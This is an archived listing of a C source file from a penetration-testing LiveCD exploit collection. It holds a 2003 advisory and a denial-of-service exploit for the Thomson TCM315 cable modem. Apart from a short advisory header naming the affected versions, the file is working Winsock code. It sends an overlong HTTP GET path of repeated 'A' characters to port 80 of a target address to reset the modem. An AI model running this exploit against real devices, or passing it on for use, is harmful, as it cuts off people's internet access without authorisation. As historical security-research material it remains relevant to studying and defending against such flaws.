home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / thomson / thomson-dos.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  1.1 KB  |  50 lines
  1. /*
  2. ADVISORY - Thomson Cablemodem TCM315 Denial of Service
  3.  
  4. Shell security group (2003) http://www.shellsec.net
  5.  
  6. November 10 of 2003
  7.  
  8. Tested against: TCM315 MP
  9. Software Version: ST31.04.00
  10. Software Model: A801
  11. Bootloader: 2.1.4c
  12. Impact: Users with access to the network can remotely shutdown internet 
  13. connection.
  14.  
  15. Discovered by: aT4r Andres[at]shellsec.net
  16. Vendor: contacted (no answer)
  17. Fix: no yet
  18.  
  19. usage: just, thdos.exe 192.168.100.1
  20.  
  21. */
  22.  
  23. #include <stdio.h>
  24. #include <winsock2.h>
  25.  
  26. void main(int argc,char *argv[]) {
  27. char evil[150],buffer[1000];
  28. struct sockaddr_in shellsec;
  29. int fd;
  30. WSADATA ws;
  31.  
  32. WSAStartup( MAKEWORD(1,1), &( ws) );
  33.  
  34. shellsec.sin_family = AF_INET;
  35. shellsec.sin_port = htons(80);
  36. shellsec.sin_addr.s_addr = inet_addr(argv[1]);
  37.  
  38. memset(evil,'\0',sizeof(evil));
  39. memset(evil,'A',100);
  40. sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil);
  41.  
  42. fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  43. if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) {
  44. send(fd,buffer,strlen(buffer),0);
  45. printf("done. Thomson Cablemodem reset!\n");
  46. sleep(100);
  47. }
  48. else printf("Unable to connect to CM.\n");
  49. }
  50.